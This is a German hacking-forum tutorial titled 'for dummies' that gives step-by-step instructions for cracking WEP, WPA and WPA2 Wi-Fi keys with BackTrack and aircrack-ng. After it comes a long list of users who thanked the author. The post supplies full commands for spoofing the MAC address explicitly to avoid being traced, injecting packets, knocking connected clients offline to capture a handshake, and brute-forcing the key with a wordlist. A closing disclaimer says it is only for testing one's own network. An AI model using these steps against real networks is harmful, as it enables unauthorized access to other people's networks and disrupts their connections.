Ergebnis 1 bis 10 von 210

Baum-Darstellung

  1. #1
    Michelangelo Virus Avatar von Armageddon
    Registriert seit
    21.01.2008
    Beiträge
    273

    Standard [TuT] Wep/Wpa/Wpa2 für dumpfbacken.

    Ich Lese in der Wireless section immer noch oft fragen wie: Wie hacke (ich kann das wort nicht austehen) ich ein wlan netz:

    Um diesen Fragen Vorzubeugen schreibe ich jetzt ein Tutorial für die Dumpfbacken

    1.) Laden

    Man läd sich Backtrack 4 herrunter (http://www.backtrack-linux.org/)
    Jenachdem Was ihr knacken wollt entweder die LiveCD oder die Version für den USB-Stick. (Darauf komme ich Später)

    2.) Brennen/Installieren

    Brennt den kram auf eine DVD oder - bei der USB version - installiert sie euch auf einem min. 4 GB Stick. Das sollte wirklich jeder ohne genaue anleitung können. Wenn das nicht der Fall sein sollte geht lieber wieder Sandburgen bauen.

    3.) Backtrack Starten

    Als allererstes bevor ihr BT startet schaltet ihr euer Note-Netbook / PC aus macht ihn an und geht mit F2 oder F12 (können auch anderre F* tasten sein je nach BIOS unterschiedlich) in das Bootmenu.
    Dort stellt ihr euer CD Laufwerk oder eure USB anschlüsse an 1. stelle.
    Bestätigen und nun Sollte euer PC als erstes nach Bootdateien auf dem USB-Stick oder der CD suchen.
    Jetzt Startet Backtrack.
    Nachdem der bootvorgang fertig ist müsst ihr
    Code:
    startx
    eingeben um auf die Grafische oberfläche von backtrack zu kommen.

    4.)Solangsam gehts Los! (WEP/WPA/2)

    Öffnet eine Shell. Diese findet ihr unten Links in der "Startleiste"
    (kleines Schwarzes kästchen)
    Dort tippt ihr folgendes ein um herrauszufinden welcher euer Wlan Adapter ist.

    Code:
    airmon-ng
    Falls eure Interne W-lan karte nicht erkannt wird solltet ihr euch am Besten einen Kompatieblen USB-Wlan Adapter kaufen. Eine genaue liste findet ihr wenn ihr googelt.

    5.) Mac ändern

    So Nachdem ihr nun wisst wie euer Wlan Adapter heißt
    (bei mir ist es wlan0)
    Solltet ihr eure MAC-Adresse ändern damit man euch nicht zurückverfolgen kann.
    das geht so:
    Code:
    airmon-ng stop (euer interface bei mir wlan0)
    ifconfig (euer interface bei mir wlan0) down
    macchanger --mac (beliebige mac) (euer interface bei mir wlan0)
    airmon-ng start (euer interface bei mir wlan0)
    Also wenn euer Interface wlan0 heißt (ich werde wlan0 - immer - jetzt als Bsp. nehmen)
    Sollte das ganze so aussehen:
    Code:
    airmon-ng stop wlan0
    ifconfig wlan0 down
    macchanger --mac 00:11:22:33:44:55 wlan0
    airmon-ng start wlan0
    6.) Jetzt gehts weiter für die die WEP knacken wollen WPA kommt gleich.

    Nun tippt ihr in die gleiche shell
    Code:
    airodump-ng wlan0
    Nun wird nach netzwerken gesucht.
    Ganz links seht ihr die BSSID sozusagen die MAC-Adresse vom router
    Rechts daneben PWR also Power die empfangsstärke.
    Dann kommen Beacons (für uns unwichtig)
    daneben befindet sich #Data (wird für ins später wichtig)
    dann kommt warscheinlich CH das ist der Channel aufdem der router sendet
    danach seht ihr die verschlüsselung des wlan netzes (in unserrem fall sollte es ersteinmal WEP sein)
    Ganz rechts ist die ESSID der Name des Routers

    Wenn das gewünsche/gesuchte Netzwerk gefunden ist drücken wir Ctrl+C um die suche anzuhalten.

    Wir Kopieren uns nun die BSSID herraus.

    6.) Lets Go!

    Nun tippen wir
    Code:
    airodump-ng -c (Channel stand unter CH) -w (Filename beliebiger name zb wep) --bssid (kopierte bssid) wlan0
    Jetzt werden alle empfangenen Packete in die datei wep geschrieben.

    Wir öffnen eine neue Shell und lassen die alte auf.
    Wir tippen in die neue Shell:
    Code:
    aireplay-ng -1 0 -a (Kopierte bssid) -h (Fakes MAC) -e (ESSID also der netzwerkname) wlan0
    Jetzt haben wir uns beim Router "angemeldet" wir sehen uns jetzt auf bei unserer ersten shell unten als verbunden.

    Jetzt kommt #Data ins spiel. Data sind unserre verschlüsselten Packete. Wir könnten jetzt ewig warten bis diese zahl in Shell1 auf über 18.000 ist oder wir beschleunigen das ganze mit:

    Code:
    aireplay-ng -3 -b (bssid) -h (faked mac) wlan0
    Jetzt müssen wir warten bis data über 18.000 ist das dauert ca. 2-3 min.

    7.)Hack it!
    Wir haben jetzt genügent packete gesammelt also können wir beide Shells schließen und eine neue aufmachen.
    in diese tippt ihr ein:
    Code:
    aircrack-ng -n 128 -b (bssid) (filename)-01.cap
    Als Bsp.
    Code:
    aircrack-ng -n 128 -b 00:12:32:44:D4:3F wep-01.cap
    Jetzt sollte das programm Aircrack eure daten entschlüsseln und das passwort unter dem code:
    Code:
    Key found: (pa:ss:wo:rt)
    Ausspucken.
    Das passwort ist ohne doppelpunkte zu lesen.

    Sollte ein Fehler auftreten könnte es sein das die verschlüsselung nur 64 bit beträngt dann in die konsole eingeben:
    Code:
    aircrack-ng -n 64 -b (bssid) (filename)-01.cap
    8.) Das Ganze nun auch mit WPA/2

    Das ganze funktioniert NUR wenn ein CLIENT mit dem router VERBUNDEN ist!!
    Bis:
    Wenn das gewünsche/gesuchte Netzwerk gefunden ist drücken wir Ctrl+C um die suche anzuhalten.
    Wir Kopieren uns nun die BSSID herraus.
    ist alles gleich, nur sollte unser gesuchtes netz jetzt WPA oder WPA2 verschlüsselt sein.

    9.) Let`s Go!
    Nachdem wir unsere BSSID nun kopiert haben suchen wir uns wie oben beschrieben auch den Channel herraus.
    Mit:
    Code:
    airodump-ng -c (channel) -w (filename) --bssid (bssid) wlan0
    Schreiben wir wieder unserre gesammelten daten in eine file..
    Also Bsp:
    Code:
    airodump-ng -c 11 -w wpa --bssid 00:12:F3:4D:12:1A wlan0
    Mit diesem befehl schreiben wir also, von unserrem wlan netz XY mit der BSSID 00:12:F3:4D:12:1A
    das auf channel 11 sendet, alle empfangenen daten in das file wpa-01.cap
    Anders als bei WEP kann hier anhand der gesendeten #Data nicht das passwort entschlüsselt werden.
    Hierzu benötigen wir einen Handshake.

    10.) Der Handshake
    Ein Handshake kann man wirklich frei mit Handschlag übersetzen. Unser Client (Jemd. der mit dem Router Verbunden ist)
    sendet bei einer neuanmeldung das passwort in verschlüsselter weise.
    Wir könnten nun minuten oder stunden warten bis sich unser client neu verbindet. Müssen wir aber nicht.

    Wir haben ja unserre Shell in der wir sehen wie das netzwerk heißt und wer verbunden ist das geschah mit dem letzten befehl.
    Unten sehen wir wer verbunden ist. Wenn wir einen Handshake bekommen sehen wir das daran das ganz oben Rechts in unserrer shell Handshake! steht.

    Wir öffnen nun eine neue Shell um den Clienten rauszuwerfen damit er sich neu verbinden und tippen:

    Code:
    aireplay-ng -0 5 -a (bssid) wlan0
    Wobei 5 die anzahl ist wie oft wir das ganze versuchen möchten.
    Bei dieser Methode würde unser Client nichts mitkriegen.
    Nun muss es nicht zwingend notwendig sein das das ganze funktioniert da neuere router dies nicht mehr zulassen.
    Wie bringen wir jetzt den Clienten zum disconnecten? Ganz einfach wir sagen dem Router: "Hallo ich bin der Nutzer und würde mich gerne Ausloggen!"
    Das könnte allerdings unser Client mitkriegen jedoch wer denkt sich schon was dabei
    wenn die internetverbindung flöten geht?

    Also werfen wir unserren Clienten raus:
    Code:
    aireplay-ng -0 1 -a (bssid) -c (Client Mac) wlan0
    Die Clienten Mac addresse sehen wir in Shell1 unten.

    Jetzt Sollten wir einen handshake haben.

    11.)Crack it!
    Wir haben einen handshake und können also getrost alle unserre Shells schließen und eine neue frische aufmachen.
    in diese tippen wir nun folgendes:

    Code:
    aircrack-ng (filename)-01.cap
    Wir werden nun sehen das in der datei ein Handshake vorhanden ist.
    Jetzt Brauchen wir eine Word- Combolist hier verweise ich mal auf unserre Word und Combolisten Section im board.
    Wir Browsen nun zur Wordlist die sich zB hier befindet
    [code]/home/wordlist[code/]
    in meinem Bsp heist meine Wordlist Words.txt

    nun geben wir in die Shell folgendes ein:

    Code:
    aircrack-ng (filename)-01.cap -w (Pfad zu unserer Wordlist)
    In meinem Bsp sollte das dan so ausehen:

    Code:
    aircrack-ng wpa-01.cap -w /home/wordlist/Words.txt
    So und nun testet das Programm aircrack alle wörter in der liste ob diese zu dem verschlüsselten handshake passen.
    Wenn das passwort gefunden ist wird es angezeigt.
    Zur info mein Samsung Netbook mit 1,6 Atom Testet 900 keys die sek
    Mein Thinkpad SL510 Notebook mit 2,6 dual testet 1600 keys die sek.
    Sollte das entsprechende Passwort nicht in der liste sein haben wir also Pech!


    © Armageddon

    Code:
    Haftungsausschluss:
    Ich übernehme Keinerlei haftung bei schäden oder ähnlichem.
    Dieses TuT ist nur dazu da, damit ihr testen könnt wie sicher euer 
    eigenes W-Lan netz ist.
    Ich Würde mich dennoch sehr über ein danke und ein Feedback zu meinem erstes Tutorial freuen

    Greetz

    Arma.
    Geändert von Armageddon (22.02.2010 um 00:16 Uhr) Grund: Man findet auch beim 3 drüberlesen noch fehler die man beim 2ten vergessen hat ^^

  2. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    0nk3lz (22.02.2010), 0ptic (31.12.2015), AhA-Bozz (02.04.2010), Anhost (21.04.2010), Barny (09.04.2010), Bobby35 (21.02.2010), Borgimperator (22.02.2010), Brot1,2 (19.12.2011), Bullterrier (24.02.2010), chewee (01.12.2010), Clode (06.03.2010), Coder (15.12.2010), Coffeeman (04.11.2015), Cristhecrusader (21.02.2010), D@go (02.07.2010), Dayn (06.07.2010), Deinemudda (24.02.2010), Deshoax (22.02.2010), Dr. XMas (26.05.2010), drke124l (01.04.2010), element159 (22.05.2010), Füzi (26.06.2010), Fitsch (16.06.2010), Flauscher (22.02.2012), freddyG (24.05.2010), GabbaGandalf300 (23.02.2010), gORDon_vdLg (22.02.2010), Gribbler (21.02.2010), Guardian Angel (01.05.2012), hackerking (21.02.2010), Illuminatum (22.02.2010), Jicksaw (02.09.2010), jonasus (30.05.2010), Keksdose (23.02.2010), kernel32.dll (21.02.2010), Kzed (22.02.2010), L!ke (19.05.2010), lokuspriest (21.05.2010), MarcoPeterino (22.02.2010), Metropoler (22.05.2010), NiePro (13.07.2010), PP.at (26.02.2010), r4iden (21.02.2010), R60 (24.02.2010), Rabbits (07.11.2010), RafaL (03.05.2010), Rec.127 (05.04.2010), regeN (18.11.2011), s.i.x.t.r.i.x (22.02.2010), Schlumpf2009 (20.04.2010), Simmell (21.04.2010), Slawa (23.02.2010), Sn0opY (23.02.2010), streit06 (15.06.2010), T0x1cBaSs (21.02.2010), the_hunter (30.08.2010), trisn (21.02.2010), ultimate1337 (22.02.2010), WakeUpAndDieAgain xD (03.05.2010), winboy (15.05.2010), wowa (10.03.2010), zug404 (22.02.2010), Zweitopf (27.08.2010)

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •